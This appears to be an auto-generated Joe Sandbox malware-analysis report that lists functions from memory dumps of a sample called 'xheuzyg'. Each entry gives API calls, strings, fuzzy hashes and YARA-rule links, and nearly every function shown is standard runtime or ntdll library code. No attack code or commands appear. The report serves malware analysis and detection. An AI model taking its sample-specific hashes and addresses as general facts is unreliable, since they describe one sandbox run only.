Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: fb7bfcc4c6ae657c0a3e6e2b15a811b81a9d46256b8e88ee94aee16904685355
Instruction ID: a9de2c19414bd0c506a04d123ee830f9fe9e1b0812ac3aa9d529e8f549028ebc
Opcode Fuzzy Hash: fb7bfcc4c6ae657c0a3e6e2b15a811b81a9d46256b8e88ee94aee16904685355
Instruction Fuzzy Hash: 4321927AE00159ABDB11DF79DC50AEEBBF9FF54641F08011EEA45E3240EB30DA118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 001A1878 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 001A18D1
std::system_error::system_error.LIBCPMT ref: 001A18E0

Part of subcall function 001A16A2: __Init_thread_footer.LIBCMT ref: 001A1703

Strings

ios_base::eofbit set, xrefs: 001A18C6
ios_base::badbit set, xrefs: 001A1897
ios_base::failbit set, xrefs: 001A18B9

Memory Dump Source

Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd

Similarity

API ID: Exception@8Init_thread_footerThrowstd::system_error::system_error
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 1054456820-1866435925
Opcode ID: 59564109ce6721ca6981465f57a59677c23f90e9ae6a1f8900d6c00c07e4e911
Instruction ID: df6193bed593758df005c03afe2e874a06b6c1738a9731931e3d57f68dc5dbb0
Opcode Fuzzy Hash: 59564109ce6721ca6981465f57a59677c23f90e9ae6a1f8900d6c00c07e4e911
Instruction Fuzzy Hash: 06F0283D9403087EDB14BA95CC03FBA77AC9F12784F148019F845A6282C7B99805C3A1

Uniqueness

Uniqueness Score: -1.00%

Function 001A1253 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 001A1260
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 001A1296

Part of subcall function 001AF100: _Yarn.LIBCPMT ref: 001AF11F
Part of subcall function 001AF100: _Yarn.LIBCPMT ref: 001AF143

std::exception::exception.LIBCONCRT ref: 001A12AF
__CxxThrowException@8.LIBVCRUNTIME ref: 001A12C4

Strings

bad locale name, xrefs: 001A12A7

Memory Dump Source

Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd

Similarity

API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throwstd::exception::exception
String ID: bad locale name
API String ID: 159601860-1405518554
Opcode ID: c96ba02b2a1c04063ca5c3ba76b127fa96f9fb34623b85ada55dc373afceacee
Instruction ID: 91b8b9fae90eedc6fb91db4b137552529f25807321ee44045def24db17a9d415
Opcode Fuzzy Hash: c96ba02b2a1c04063ca5c3ba76b127fa96f9fb34623b85ada55dc373afceacee
Instruction Fuzzy Hash: 89014475905744AEC720DFAAD481486FBE8BE293107908A6FE48AD3A11D770E504CB99

Uniqueness

Uniqueness Score: -1.00%

Function 001B816E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,001C986E,000000FF,?,001B8108,?,?,001B80DC,00000016), ref: 001B81A3
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 001B81B5
FreeLibrary.KERNEL32(00000000,?,00000000,001C986E,000000FF,?,001B8108,?,?,001B80DC,00000016), ref: 001B81D7

Strings

mscoree.dll, xrefs: 001B819C
CorExitProcess, xrefs: 001B81AD

Memory Dump Source

Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: f008c65ba967b8db13e903ada15e02b98b9d3a5c2ddb15a95089d2be3ac9fd0c
Instruction ID: e532f5418c696d94a282f301ee237c8bca330c09eb0827b9409a5d98d0de35ba
Opcode Fuzzy Hash: f008c65ba967b8db13e903ada15e02b98b9d3a5c2ddb15a95089d2be3ac9fd0c
Instruction Fuzzy Hash: 23014B32904669AFDB129F54DC09FAEBBF8FB04B58F000629F811A26A0DB75D950CA91

Uniqueness

Uniqueness Score: -1.00%

Function 001BEBB4 Relevance: 7.7, APIs: 5, Instructions: 197COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 001BEC39
__alloca_probe_16.LIBCMT ref: 001BED02
__freea.LIBCMT ref: 001BED69

Part of subcall function 001B7330: HeapAlloc.KERNEL32(00000000,00000016,?,?,00000003,001B5271,?,001B50D5,?,00000016,001B5A86), ref: 001B7362

__freea.LIBCMT ref: 001BED7C
__freea.LIBCMT ref: 001BED89

Memory Dump Source

Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: 073fcef5bfe98504a3dd8036e1c9ae17d32d90d86b38c20ca1c213ae1a41f577
Instruction ID: f9d85bfb9e06646ccfdcd3b39a780c9f3da7ec042ab7628b65f47fb4ecf41c2e
Opcode Fuzzy Hash: 073fcef5bfe98504a3dd8036e1c9ae17d32d90d86b38c20ca1c213ae1a41f577
Instruction Fuzzy Hash: 2D51E172600246AFEB249FE0CC81EFB3AEAEF95720F15052CFC08D6150EBB0DC5196A0

Uniqueness

Uniqueness Score: -1.00%

Function 015EF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 016302E7
RTL: Re-Waiting, xrefs: 0163031E
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 016302BD

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: c5abbff752279591b56195804e311db70439a04a3724b4a6632c4bc19fa25c78
Instruction ID: a1b1c7946e7983272bec8b1374db2370507b229eaf29a4a7849c087531a67eed
Opcode Fuzzy Hash: c5abbff752279591b56195804e311db70439a04a3724b4a6632c4bc19fa25c78
Instruction Fuzzy Hash: E2E18071A087429FE729CF28C888B2ABBE1BF84314F144A5EF5958B3D1DB74D945CB42

Uniqueness

Uniqueness Score: -1.00%

Function 001A1C5A Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 164COMMON

Download Yara Rule

APIs

Part of subcall function 001AE4D9: __EH_prolog.LIBCMT ref: 001AE4DE

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 001A1E44

Part of subcall function 001ACBFB: _memcmp.LIBVCRUNTIME ref: 001ACC63

Strings

<c r=, xrefs: 001A1CEB, 001A1CF2, 001A1CFB, 001A1DDC, 001A1DE1, 001A1DEA
</v>, xrefs: 001A1D6A, 001A1D71, 001A1D7A
<v>, xrefs: 001A1D52, 001A1D57, 001A1D60

Memory Dump Source

Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd

Similarity

API ID: H_prologIos_base_dtor_memcmpstd::ios_base::_
String ID: </v>$<c r=$<v>
API String ID: 2171099386-3488173955
Opcode ID: fc0929b5457149f033e50979723a348fcf93da067736708e6f81fa38d66970d2
Instruction ID: 60ee7695180e59a9f5a63f25d3c4f94eb36793fd85ad22e897a6369376d493dd
Opcode Fuzzy Hash: fc0929b5457149f033e50979723a348fcf93da067736708e6f81fa38d66970d2
Instruction Fuzzy Hash: 7751D3761083406ED314EB24DC86EAFBBE8EFD6354F004A2DF59697291DB709909C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 015FBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01637B7F
RTL: Re-Waiting, xrefs: 01637BAC
RTL: Resource at %p, xrefs: 01637B8E

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 45f0aab5379ae31daaf8c51de0752931378a958e0a51c8197d31b4d6b9768e67
Instruction ID: 8820db57b202f1d5aa07c59526e4d2bad900691086d03a2124e3b55c028db8bd
Opcode Fuzzy Hash: 45f0aab5379ae31daaf8c51de0752931378a958e0a51c8197d31b4d6b9768e67
Instruction Fuzzy Hash: 1341D0357047029FD725DE29CC40B6BB7E6FF98720F100A1DEA6A9B780DB31E9058B95

Uniqueness

Uniqueness Score: -1.00%

Function 015FB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0163728C

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01637294
RTL: Re-Waiting, xrefs: 016372C1
RTL: Resource at %p, xrefs: 016372A3

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 12a0ba85ced21821e2de1cf87735dfeb89c956140c8c1b86ee04f0846aa7e058
Instruction ID: 0345742ea9ea08acfafb05acde0bb94d2dfedf12881fd780cfd2538ab65447f5
Opcode Fuzzy Hash: 12a0ba85ced21821e2de1cf87735dfeb89c956140c8c1b86ee04f0846aa7e058
Instruction Fuzzy Hash: 5C410071700206ABD721CE29CC41F6AB7A6FF94710F104A1DFE55AB380DB21F8428BD5

Uniqueness

Uniqueness Score: -1.00%

Function 01672300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0167238D
___swprintf_l.LIBCMT ref: 016723B3

Strings

]:%u, xrefs: 016723AA
%%%u, xrefs: 01672384

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: b47620dc5f99a0d2851d0fcabb5e82a227a420e5616d62ba18962681ba9205c8
Instruction ID: db2073592791268685191b43c09918175eff041cef0db78b2b446e59ef490752
Opcode Fuzzy Hash: b47620dc5f99a0d2851d0fcabb5e82a227a420e5616d62ba18962681ba9205c8
Instruction Fuzzy Hash: 5C316172A006199FDB20DF2DDC50BEFB7F9FB54610F44455EE949E3240EB30AA558BA0

Uniqueness

Uniqueness Score: -1.00%

Function 001BB978 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 001BB9DB

Part of subcall function 001C11A1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,001BED5F,?,00000000,-00000008), ref: 001C1202

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 001BBC2D
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 001BBC73
GetLastError.KERNEL32 ref: 001BBD16

Memory Dump Source

Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 30bafd1970cd88088d3fd4c9f94577787e8c4020ea79ad0efee4d28d9327d0ef
Instruction ID: e80f502c74f0e1009ec33310733f237df15c13417417044f101471337e295d32
Opcode Fuzzy Hash: 30bafd1970cd88088d3fd4c9f94577787e8c4020ea79ad0efee4d28d9327d0ef
Instruction Fuzzy Hash: A1D188B5D082489FCF15CFA8C8D0AEDBBB5FF09304F28452AE856EB651D770A942CB50

Uniqueness

Uniqueness Score: -1.00%

Function 001C1462 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 001C11A1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,001BED5F,?,00000000,-00000008), ref: 001C1202

GetLastError.KERNEL32 ref: 001C14C6
__dosmaperr.LIBCMT ref: 001C14CD
GetLastError.KERNEL32(?,?,?,?), ref: 001C1507
__dosmaperr.LIBCMT ref: 001C150E

Memory Dump Source

Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 713b5a02dcef0686d2119146bd21ad3c03df7be2a3e72a25da7cd182d078c62d
Instruction ID: 5879813038cc4f2048a93541e567ad74cee9b4672f6f6bc840ab0e42b4f351fe
Opcode Fuzzy Hash: 713b5a02dcef0686d2119146bd21ad3c03df7be2a3e72a25da7cd182d078c62d
Instruction Fuzzy Hash: D621C572640205BF9F24AF66CC81EABB7A9FF763A8711851CF91A97142D730EC40CB61

Uniqueness

Uniqueness Score: -1.00%

Function 001B7959 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d99817f9fa433bd5c7fc1e895bfdc3525a43e2deef1b28e3501ad438f4c4fbce
Instruction ID: c856b30029250c9a7dd7fa0c99d4f903c69e576394fe64e042bb281813c6158d
Opcode Fuzzy Hash: d99817f9fa433bd5c7fc1e895bfdc3525a43e2deef1b28e3501ad438f4c4fbce
Instruction Fuzzy Hash: 0C21F631608205AFAB60AF76DC81DEFB7A9BFA13A87054914F919E75D1D730ED4087A0

Uniqueness

Uniqueness Score: -1.00%

Function 001C2403 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 001C240B

Part of subcall function 001C11A1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,001BED5F,?,00000000,-00000008), ref: 001C1202

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 001C2443
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 001C2463

Memory Dump Source

Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 014788fd4f561f189c1fffba61706749fabb2be4dc235c8ea1802a15aedea0ed
Instruction ID: 3a3239c8a9f2ba4f11e1779af32997580afd65e1d2d599e5c131e8cc4b445be2
Opcode Fuzzy Hash: 014788fd4f561f189c1fffba61706749fabb2be4dc235c8ea1802a15aedea0ed
Instruction Fuzzy Hash: 8211D6B2A05219FF671A27719C8EEAF6D6CEEA93A83510028F501D1101FB74CD0181B1

Uniqueness

Uniqueness Score: -1.00%

Function 001B22C1 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 001B22D8

Part of subcall function 001B2910: ___AdjustPointer.LIBCMT ref: 001B295A

_UnwindNestedFrames.LIBCMT ref: 001B22EF
___FrameUnwindToState.LIBVCRUNTIME ref: 001B2301
CallCatchBlock.LIBVCRUNTIME ref: 001B2325

Memory Dump Source

Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: 016e3b4a47e3c793a89763145e5dfa688c85616b6bcb55d92dd5a28a327169d4
Instruction ID: 579d02e0d58413cb68fcd450e2a6fa41b9a3ff32d82270c2bd18a260a69cea82
Opcode Fuzzy Hash: 016e3b4a47e3c793a89763145e5dfa688c85616b6bcb55d92dd5a28a327169d4
Instruction Fuzzy Hash: 54010832000109FBCF126F55CC01EEA3BBAFF58754F158154FD18A6121D736E9A5EBA4

Uniqueness

Uniqueness Score: -1.00%

Function 001C82B3 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,001B6731,00000000,00000000,?,001C57A5,00000000,00000001,?,?,?,001BBD6A,?,00000000,00000000), ref: 001C82CA
GetLastError.KERNEL32(?,001C57A5,00000000,00000001,?,?,?,001BBD6A,?,00000000,00000000,?,?,?,001BC344,00000000), ref: 001C82D6

Part of subcall function 001C829C: CloseHandle.KERNEL32(FFFFFFFE,001C82E6,?,001C57A5,00000000,00000001,?,?,?,001BBD6A,?,00000000,00000000,?,?), ref: 001C82AC

___initconout.LIBCMT ref: 001C82E6

Part of subcall function 001C825E: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,001C828D,001C5792,?,?,001BBD6A,?,00000000,00000000,?), ref: 001C8271

WriteConsoleW.KERNEL32(00000000,00000000,001B6731,00000000,?,001C57A5,00000000,00000001,?,?,?,001BBD6A,?,00000000,00000000,?), ref: 001C82FB

Memory Dump Source

Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 3b1d4bc5219df6d872cf7512e75bf9178f882db4a2eab7bf29996077233b5407
Instruction ID: 85cf91a034373ea966cda54712f98a31f23d5994b53b64c93483f0c9adbc9941
Opcode Fuzzy Hash: 3b1d4bc5219df6d872cf7512e75bf9178f882db4a2eab7bf29996077233b5407
Instruction Fuzzy Hash: 62F03036003169BFCF221F91DC48E8A3F66FF28BE1B404014FA098A530CB32C861DB92

Uniqueness

Uniqueness Score: -1.00%

Function 01607D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01607E8B

Strings

+, xrefs: 01607DE8
-, xrefs: 01607DDD

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: 11a65002e6c21a140d3b6d251918a337636b2b72be95cee96b8e8998cc406a56
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: ED918F71E0021A9AEB2ADF6DCC816BFBBA5AF44320F14451EE995A73C1E730AD41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 015C9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 015C9175
$, xrefs: 015C9191

Memory Dump Source

Source File: 00000004.00000002.1286241915.0000000001590000.00000040.00001000.00020000.00000000.sdmp, Offset: 01590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1590000_xheuzyg.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: fef239520868334ec204fd123b0c31dbd47d10efe748d86c9c508b3daa6b8dcd
Instruction ID: 668c85a83951a533f68ebc6fbff67370cfc4c2b795c9c82536e69c970eac73a5
Opcode Fuzzy Hash: fef239520868334ec204fd123b0c31dbd47d10efe748d86c9c508b3daa6b8dcd
Instruction Fuzzy Hash: F8810B72D006799BDB358F94CC55BEEBAB8BB48714F0041DAEA19B7240D7705E85CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 001B75FD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 001B768D

Strings

pow, xrefs: 001B7665, 001B7682

Memory Dump Source

Source File: 00000004.00000002.1285423455.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000004.00000002.1285401955.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285453040.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285478036.00000000001DA000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285498534.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1285519139.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1a0000_xheuzyg.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: f668f79c6b685a753630803679e9e46d0d5eedc6d4f341468a1bb8a5b3c18c0c
Instruction ID: 10ad830b254699740e1bffb8d76a5a4a8e745c388e7cefb8e0387406f1e14244
Opcode Fuzzy Hash: f668f79c6b685a753630803679e9e46d0d5eedc6d4f341468a1bb8a5b3c18c0c
Instruction Fuzzy Hash: DC519C61A1D602D6DB177B58C901BFA7BE0EBA4B40F304D6CE096812E9EF35CCD19A46

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exePID: 4056, Parent PID: 1664COMMON

Execution Graph

Execution Coverage:	2.3%
